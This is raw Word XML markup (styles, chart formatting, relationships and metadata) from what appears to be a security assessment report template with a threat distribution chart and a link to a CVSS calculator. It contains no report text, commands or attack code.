    <w:rsid w:val="002B1DF8"/>
    <w:rsid w:val="002C1406"/>
    <w:rsid w:val="002C4C1B"/>
    <w:rsid w:val="002D32A1"/>
    <w:rsid w:val="002D6565"/>
    <w:rsid w:val="002D7500"/>
    <w:rsid w:val="002E1FBF"/>
    <w:rsid w:val="002E3CC9"/>
    <w:rsid w:val="002F5A96"/>
    <w:rsid w:val="003004E9"/>
    <w:rsid w:val="00302FC9"/>
    <w:rsid w:val="0030503F"/>
    <w:rsid w:val="00310B53"/>
    <w:rsid w:val="00316FA4"/>
    <w:rsid w:val="00323B97"/>
    <w:rsid w:val="003262E9"/>
    <w:rsid w:val="00332D94"/>
    <w:rsid w:val="00337AA2"/>
    <w:rsid w:val="003579B4"/>
    <w:rsid w:val="00365F17"/>
    <w:rsid w:val="00377AD7"/>
    <w:rsid w:val="003B4957"/>
    <w:rsid w:val="003C0FC9"/>
    <w:rsid w:val="003D7244"/>
    <w:rsid w:val="003D7A47"/>
    <w:rsid w:val="003E0A90"/>
    <w:rsid w:val="003E0DD0"/>
    <w:rsid w:val="003F0DC3"/>
    <w:rsid w:val="003F21BF"/>
    <w:rsid w:val="003F437F"/>
    <w:rsid w:val="003F55F9"/>
    <w:rsid w:val="00401B5D"/>
    <w:rsid w:val="00403259"/>
    <w:rsid w:val="0040530A"/>
    <w:rsid w:val="004128D4"/>
    <w:rsid w:val="00420B57"/>
    <w:rsid w:val="00422CCC"/>
    <w:rsid w:val="00427879"/>
    <w:rsid w:val="00447580"/>
    <w:rsid w:val="00455988"/>
    <w:rsid w:val="0046734B"/>
    <w:rsid w:val="00473A94"/>
    <w:rsid w:val="00476F6C"/>
    <w:rsid w:val="00486352"/>
    <w:rsid w:val="0049526E"/>
    <w:rsid w:val="0049745C"/>
    <w:rsid w:val="00497ACC"/>
    <w:rsid w:val="004B4160"/>
    <w:rsid w:val="004E6CA2"/>
    <w:rsid w:val="0050039E"/>
    <w:rsid w:val="00501B89"/>
    <w:rsid w:val="00510186"/>
    <w:rsid w:val="00511B20"/>
    <w:rsid w:val="005143D5"/>
    <w:rsid w:val="00514968"/>
    <w:rsid w:val="00517F18"/>
    <w:rsid w:val="005237F8"/>
    <w:rsid w:val="0052662F"/>
    <w:rsid w:val="00530EBB"/>
    <w:rsid w:val="005328D8"/>
    <w:rsid w:val="00534C6F"/>
    <w:rsid w:val="00543905"/>
    <w:rsid w:val="00553469"/>
    <w:rsid w:val="00555890"/>
    <w:rsid w:val="00564EC3"/>
    <w:rsid w:val="00572521"/>
    <w:rsid w:val="00572913"/>
    <w:rsid w:val="00572E1D"/>
    <w:rsid w:val="00575CA4"/>
    <w:rsid w:val="005B14A0"/>
    <w:rsid w:val="005B397C"/>
    <w:rsid w:val="005B659A"/>
    <w:rsid w:val="005C6081"/>
    <w:rsid w:val="005D0744"/>
    <w:rsid w:val="005D1A93"/>
    <w:rsid w:val="005D3538"/>
    <w:rsid w:val="005D5315"/>
    <w:rsid w:val="005D5DC1"/>
    <w:rsid w:val="005E3A2A"/>
    <w:rsid w:val="006003F5"/>
    <w:rsid w:val="00604934"/>
    <w:rsid w:val="00610741"/>
    <w:rsid w:val="00622BA1"/>
    <w:rsid w:val="00654EB0"/>
    <w:rsid w:val="006645FB"/>
    <w:rsid w:val="006741B3"/>
    <w:rsid w:val="00676991"/>
    <w:rsid w:val="00685C23"/>
    <w:rsid w:val="00692F6E"/>
    <w:rsid w:val="0069462A"/>
    <w:rsid w:val="006A7B68"/>
    <w:rsid w:val="006B14B0"/>
    <w:rsid w:val="006B1E57"/>
    <w:rsid w:val="006B3C8A"/>
    <w:rsid w:val="006C3F1D"/>
    <w:rsid w:val="006C714C"/>
    <w:rsid w:val="006D7270"/>
    <w:rsid w:val="006E5B9F"/>
    <w:rsid w:val="00703C00"/>
    <w:rsid w:val="00705B66"/>
    <w:rsid w:val="007106BE"/>
    <w:rsid w:val="007207F2"/>
    <w:rsid w:val="00720CD5"/>
    <w:rsid w:val="0074459E"/>
    <w:rsid w:val="00744B88"/>
    <w:rsid w:val="00747DFB"/>
    <w:rsid w:val="00747FEA"/>
    <w:rsid w:val="00752DB7"/>
    <w:rsid w:val="007537A2"/>
    <w:rsid w:val="00756530"/>
    <w:rsid w:val="00762382"/>
    <w:rsid w:val="007635A8"/>
    <w:rsid w:val="007B130F"/>
    <w:rsid w:val="007B3CD3"/>
    <w:rsid w:val="007C2219"/>
    <w:rsid w:val="007C5D4F"/>
    <w:rsid w:val="007C5FDF"/>
    <w:rsid w:val="007C71D9"/>
    <w:rsid w:val="007E1517"/>
    <w:rsid w:val="007E57F9"/>
    <w:rsid w:val="007E66C1"/>
    <w:rsid w:val="007E6DE7"/>
    <w:rsid w:val="007F22F2"/>
    <w:rsid w:val="007F5912"/>
    <w:rsid w:val="00803EB0"/>
    <w:rsid w:val="0081201C"/>
    <w:rsid w:val="008132F5"/>
    <w:rsid w:val="00816F87"/>
    <w:rsid w:val="00820088"/>
    <w:rsid w:val="00821C19"/>
    <w:rsid w:val="00825B37"/>
    <w:rsid w:val="00833DC9"/>
    <w:rsid w:val="00842BCF"/>
    <w:rsid w:val="008512BD"/>
    <w:rsid w:val="00864FB6"/>
    <w:rsid w:val="00865C65"/>
    <w:rsid w:val="008715B6"/>
    <w:rsid w:val="00873DFF"/>
    <w:rsid w:val="00881932"/>
    <w:rsid w:val="008822C7"/>
    <w:rsid w:val="008973BD"/>
    <w:rsid w:val="008A1945"/>
    <w:rsid w:val="008B06DA"/>
    <w:rsid w:val="008B7E9C"/>
    <w:rsid w:val="008C007E"/>
    <w:rsid w:val="008D2249"/>
    <w:rsid w:val="008E08FD"/>
    <w:rsid w:val="008E0CA4"/>
    <w:rsid w:val="008E1B56"/>
    <w:rsid w:val="008F3B22"/>
    <w:rsid w:val="008F78E8"/>
    <w:rsid w:val="00913721"/>
    <w:rsid w:val="0092341D"/>
    <w:rsid w:val="00923748"/>
    <w:rsid w:val="009268C5"/>
    <w:rsid w:val="00927E92"/>
    <w:rsid w:val="0093019F"/>
    <w:rsid w:val="0093600D"/>
    <w:rsid w:val="00940259"/>
    <w:rsid w:val="0094110E"/>
    <w:rsid w:val="009415E7"/>
    <w:rsid w:val="00942596"/>
    <w:rsid w:val="0094306E"/>
    <w:rsid w:val="00951F9A"/>
    <w:rsid w:val="00952A87"/>
    <w:rsid w:val="00961554"/>
    <w:rsid w:val="00966F90"/>
    <w:rsid w:val="00975112"/>
    <w:rsid w:val="00975178"/>
    <w:rsid w:val="0098101A"/>
    <w:rsid w:val="00982383"/>
    <w:rsid w:val="009907E1"/>
    <w:rsid w:val="0099121A"/>
    <w:rsid w:val="00994706"/>
    <w:rsid w:val="009A6CB6"/>
    <w:rsid w:val="009A6E19"/>
    <w:rsid w:val="009A7D2A"/>
    <w:rsid w:val="009B7149"/>
    <w:rsid w:val="009C1FDD"/>
    <w:rsid w:val="009C4713"/>
    <w:rsid w:val="009C5E9E"/>
    <w:rsid w:val="009D4668"/>
    <w:rsid w:val="009E22E7"/>
    <w:rsid w:val="009F2AE6"/>
    <w:rsid w:val="009F6C66"/>
    <w:rsid w:val="00A02194"/>
    <w:rsid w:val="00A0352D"/>
    <w:rsid w:val="00A11A70"/>
    <w:rsid w:val="00A20AC7"/>
    <w:rsid w:val="00A25F4B"/>
    <w:rsid w:val="00A26D71"/>
    <w:rsid w:val="00A419ED"/>
    <w:rsid w:val="00A4259F"/>
    <w:rsid w:val="00A43DA9"/>
    <w:rsid w:val="00A551F2"/>
    <w:rsid w:val="00A6313E"/>
    <w:rsid w:val="00A63918"/>
    <w:rsid w:val="00A669A3"/>
    <w:rsid w:val="00A817DF"/>
    <w:rsid w:val="00A81FFF"/>
    <w:rsid w:val="00A86768"/>
    <w:rsid w:val="00A86F52"/>
    <w:rsid w:val="00AA1AAB"/>
    <w:rsid w:val="00AA2066"/>
    <w:rsid w:val="00AA5545"/>
    <w:rsid w:val="00AB5E44"/>
    <w:rsid w:val="00AE30F7"/>
    <w:rsid w:val="00AE3F41"/>
    <w:rsid w:val="00AE4A35"/>
    <w:rsid w:val="00AE55F6"/>
    <w:rsid w:val="00B00103"/>
    <w:rsid w:val="00B022A4"/>
    <w:rsid w:val="00B03A34"/>
    <w:rsid w:val="00B108CA"/>
    <w:rsid w:val="00B15A3A"/>
    <w:rsid w:val="00B217DF"/>
    <w:rsid w:val="00B23E59"/>
    <w:rsid w:val="00B266DA"/>
    <w:rsid w:val="00B266E8"/>
    <w:rsid w:val="00B37A11"/>
    <w:rsid w:val="00B454F4"/>
    <w:rsid w:val="00B46D38"/>
    <w:rsid w:val="00B549B1"/>
    <w:rsid w:val="00B57D28"/>
    <w:rsid w:val="00B61CDF"/>
    <w:rsid w:val="00B6471C"/>
    <w:rsid w:val="00B67103"/>
    <w:rsid w:val="00B7000D"/>
    <w:rsid w:val="00B74607"/>
    <w:rsid w:val="00B75C94"/>
    <w:rsid w:val="00B97A0E"/>
    <w:rsid w:val="00BA7550"/>
    <w:rsid w:val="00BB3D08"/>
    <w:rsid w:val="00BB463F"/>
    <w:rsid w:val="00BD1CC8"/>
    <w:rsid w:val="00BD4C4C"/>
    <w:rsid w:val="00BF1C14"/>
    <w:rsid w:val="00BF2BC5"/>
    <w:rsid w:val="00C0342B"/>
    <w:rsid w:val="00C03D7F"/>
    <w:rsid w:val="00C12F17"/>
    <w:rsid w:val="00C15281"/>
    <w:rsid w:val="00C2070B"/>
    <w:rsid w:val="00C2337D"/>
    <w:rsid w:val="00C30253"/>
    <w:rsid w:val="00C313BE"/>
    <w:rsid w:val="00C3341E"/>
    <w:rsid w:val="00C40004"/>
    <w:rsid w:val="00C450CD"/>
    <w:rsid w:val="00C4615A"/>
    <w:rsid w:val="00C4670A"/>
    <w:rsid w:val="00C62CF8"/>
    <w:rsid w:val="00C91AD5"/>
    <w:rsid w:val="00CA50CF"/>
    <w:rsid w:val="00CA69AB"/>
    <w:rsid w:val="00CB3A22"/>
    <w:rsid w:val="00CC07F7"/>
    <w:rsid w:val="00CC3A2C"/>
    <w:rsid w:val="00CC7021"/>
    <w:rsid w:val="00CC78B5"/>
    <w:rsid w:val="00CE3A90"/>
    <w:rsid w:val="00CF0C73"/>
    <w:rsid w:val="00CF48A5"/>
    <w:rsid w:val="00D00616"/>
    <w:rsid w:val="00D21DA9"/>
    <w:rsid w:val="00D328EC"/>
    <w:rsid w:val="00D41FBF"/>
    <w:rsid w:val="00D44CE9"/>
    <w:rsid w:val="00D5463D"/>
    <w:rsid w:val="00D56AE0"/>
    <w:rsid w:val="00D61511"/>
    <w:rsid w:val="00D66F72"/>
    <w:rsid w:val="00D70695"/>
    <w:rsid w:val="00D7076E"/>
    <w:rsid w:val="00D85EA3"/>
    <w:rsid w:val="00D93F0C"/>
    <w:rsid w:val="00D96740"/>
    <w:rsid w:val="00DA05D9"/>
    <w:rsid w:val="00DA34FE"/>
    <w:rsid w:val="00DA625B"/>
    <w:rsid w:val="00DB3CAA"/>
    <w:rsid w:val="00DB7229"/>
    <w:rsid w:val="00DC7124"/>
    <w:rsid w:val="00DE017C"/>
    <w:rsid w:val="00DE17C5"/>
    <w:rsid w:val="00DE5079"/>
    <w:rsid w:val="00DF2734"/>
    <w:rsid w:val="00DF3A99"/>
    <w:rsid w:val="00E103CB"/>
    <w:rsid w:val="00E12C32"/>
    <w:rsid w:val="00E16517"/>
    <w:rsid w:val="00E178BE"/>
    <w:rsid w:val="00E179C0"/>
    <w:rsid w:val="00E20217"/>
    <w:rsid w:val="00E21CB3"/>
    <w:rsid w:val="00E2201F"/>
    <w:rsid w:val="00E33133"/>
    <w:rsid w:val="00E45B64"/>
    <w:rsid w:val="00E46902"/>
    <w:rsid w:val="00E46C91"/>
    <w:rsid w:val="00E500DD"/>
    <w:rsid w:val="00E64DAC"/>
    <w:rsid w:val="00E712FE"/>
    <w:rsid w:val="00E73875"/>
    <w:rsid w:val="00E806F8"/>
    <w:rsid w:val="00E8248D"/>
    <w:rsid w:val="00E930B0"/>
    <w:rsid w:val="00EA62BD"/>
    <w:rsid w:val="00EA7904"/>
    <w:rsid w:val="00EB23B5"/>
    <w:rsid w:val="00EC5969"/>
    <w:rsid w:val="00EC6B31"/>
    <w:rsid w:val="00ED35D5"/>
    <w:rsid w:val="00ED3A73"/>
    <w:rsid w:val="00ED5140"/>
    <w:rsid w:val="00EE67DC"/>
    <w:rsid w:val="00EE6CC5"/>
    <w:rsid w:val="00EF186D"/>
    <w:rsid w:val="00EF23B7"/>
    <w:rsid w:val="00EF2751"/>
    <w:rsid w:val="00F37D38"/>
    <w:rsid w:val="00F44345"/>
    <w:rsid w:val="00F5210C"/>
    <w:rsid w:val="00F52132"/>
    <w:rsid w:val="00F643A9"/>
    <w:rsid w:val="00F67A7B"/>
    <w:rsid w:val="00FA0EA5"/>
    <w:rsid w:val="00FA3025"/>
    <w:rsid w:val="00FA4F3E"/>
    <w:rsid w:val="00FA679E"/>
    <w:rsid w:val="00FB5042"/>
    <w:rsid w:val="00FB5B50"/>
    <w:rsid w:val="00FC3871"/>
    <w:rsid w:val="00FC3E23"/>
    <w:rsid w:val="00FC5F46"/>
    <w:rsid w:val="00FD1ADF"/>
    <w:rsid w:val="00FD40D3"/>
    <w:rsid w:val="00FE61C2"/>
    <w:rsid w:val="00FF06A4"/>
    <w:rsid w:val="00FF088F"/>
    <w:rsid w:val="00FF3F9B"/>
    <w:rsid w:val="00FF66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E82E3A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B4ECEEE-0BB1-405F-A37B-E5EAD043A7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6C91"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri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90C9C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:left="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="FF2323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06A4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="160" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="E02323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2F6E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="160" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="410101"/>
      <w:sz w:val="3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06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06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06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06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06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06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0C9C"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="FF2323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F06A4"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="E02323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92F6E"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="410101"/>
      <w:sz w:val="30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06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06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06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06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06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06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06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06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06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06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06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06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06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06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06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06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069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F1B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chnicalTable">
    <w:name w:val="Technical Table"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00E500DD"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="630101"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D656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6565"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TechnicalHeader">
    <w:name w:val="Technical Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TechnicalHeaderChar"/>
    <w:qFormat/>
    <w:rsid w:val="00CC07F7"/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="630101"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TechnicalHeaderChar">
    <w:name w:val="Technical Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="TechnicalHeader"/>
    <w:rsid w:val="00CC07F7"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="630101"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0099121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3579B4"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:pBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="240" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:caps w:val="0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579B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579B4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579B4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA20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2066"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA20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2066"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable1">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="00B549B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510186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4559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103C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103CB"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="001F093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F093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22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9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26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2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80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54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6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0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2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5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23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7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10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6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8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25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540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967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107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8861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36336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485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885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982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382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485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682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180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1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47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1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38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9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010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506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2435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9337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8152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2480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9349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0451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4312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578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4316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828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366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2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8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5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2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00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08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1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87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8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26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96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68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2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45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24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1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38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20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image" Target="media/image3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s://www.vaadata.com/blog/linux-privilege-escalation-techniques-and-security-tips/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www.first.org/cvss/calculator/3-0" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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Threat Distribution Chart</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:satMod val="103000"/>
                    <a:lumMod val="102000"/>
                    <a:tint val="94000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent1">
                    <a:satMod val="110000"/>
                    <a:lumMod val="100000"/>
                    <a:shade val="100000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="99000"/>
                    <a:satMod val="120000"/>
                    <a:shade val="78000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000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5-68B0-4384-A586-A7CE183B22EC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2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tx2">
                          <a:lumMod val="35000"/>
                          <a:lumOff val="65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Sheet1!$A$2:$A$6</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>High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8B0-4384-A586-A7CE183B22E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00"/>
        <c:overlap val="-24"/>
        <c:axId val="2123123583"/>
        <c:axId val="807604271"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="212312358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2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07604271"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="80760427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2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12312358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2"/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rgbClr val="E02323"/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7">
  <cs:axisTitle>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
    <cs:defRPr sz="900" b="1" kern="1200"/>
  </cs:axisTitle>
  <cs:categoryAxis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2"/>
    </cs:fontRef>
    <cs:spPr>
      <a:solidFill>
        <a:schemeClr val="bg1"/>
      </a:solidFill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2"/>
    </cs:fontRef>
    <cs:defRPr sz="900" kern="1200"/>
  </cs:dataLabel>
  <cs:dataLabelCallout>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="dk2">
        <a:lumMod val="7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2"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
  </cs:dataPoint>
  <cs:dataPoint3D>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="3">
      <cs:styleClr val="auto"/>
    </cs:fillRef>
    <cs:effectRef idx="2"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
  </cs:dataPoint3D>
  <cs:dataPointLine>
    <cs:lnRef idx="0">
      <cs:styleClr val="auto"/>
    </cs:lnRef>
    <cs:fillRef idx="3"/>
    <cs:effectRef idx="2"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
    <cs:spPr>
      <a:ln w="31750" cap="rnd">
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:round/>
      </a:ln>
    </cs:spPr>
  </cs:dataPointLine>
  <cs:dataPointMarker>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="3">
      <cs:styleClr val="auto"/>
    </cs:fillRef>
    <cs:effectRef idx="2"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
    <cs:spPr>
      <a:ln w="12700">
        <a:solidFill>
          <a:schemeClr val="lt2"/>
        </a:solidFill>
        <a:round/>
      </a:ln>
    </cs:spPr>
  </cs:dataPointMarker>
  <cs:dataPointMarkerLayout symbol="circle" size="6"/>
  <cs:dataPointWireframe>
    <cs:lnRef idx="0">
      <cs:styleClr val="auto"/>
    </cs:lnRef>
    <cs:fillRef idx="3"/>
    <cs:effectRef idx="2"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2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2"/>
    </cs:fontRef>
    <cs:spPr>
      <a:ln w="9525">
        <a:solidFill>
          <a:schemeClr val="tx2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tx2"/>
    </cs:fontRef>
    <cs:spPr>
      <a:ln w="9525">
        <a:solidFill>
          <a:schemeClr val="tx2">
            <a:lumMod val="75000"/>
            <a:lumOff val="25000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:round/>
      </a:ln>
    </cs:spPr>
  </cs:errorBar>
  <cs:floor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
  </cs:floor>
  <cs:gridlineMajor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2"/>
    </cs:fontRef>
    <cs:spPr>
      <a:ln>
        <a:solidFill>
          <a:schemeClr val="tx2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2"/>
    </cs:fontRef>
    <cs:defRPr sz="900" kern="1200"/>
  </cs:legend>
  <cs:plotArea>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
  </cs:plotArea>
  <cs:plotArea3D>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
  </cs:plotArea3D>
  <cs:seriesAxis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seriesLine>
  <cs:title>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef>
    <cs:defRPr sz="1600" b="1" kern="1200"/>
  </cs:title>
  <cs:trendline>
    <cs:lnRef idx="0">
      <cs:styleClr val="auto"/>
    </cs:lnRef>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2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2"/>
    </cs:fontRef>
    <cs:defRPr sz="900" kern="1200"/>
  </cs:trendlineLabel>
  <cs:upBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2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2"/>
    </cs:fontRef>
    <cs:defRPr sz="900" kern="1200"/>
  </cs:valueAxis>
  <cs:wall>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx2"/>
    </cs:fontRef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46DF5F-607E-45F1-BEB3-3E159A13F8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3197</TotalTime>
  <Pages>8</Pages>
  <Words>929</Words>
  <Characters>5974</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>199</Lines>
  <Paragraphs>172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Abdelfattah</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ahmeed Mohammed Khattab</cp:lastModifiedBy>
  <cp:revision>241</cp:revision>
  <cp:lastPrinted>2025-01-03T21:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-16T13:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-08T05:51:00Z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tomer_Name">
    <vt:lpwstr>Customer_Name</vt:lpwstr>
  </property>
</Properties>
</file>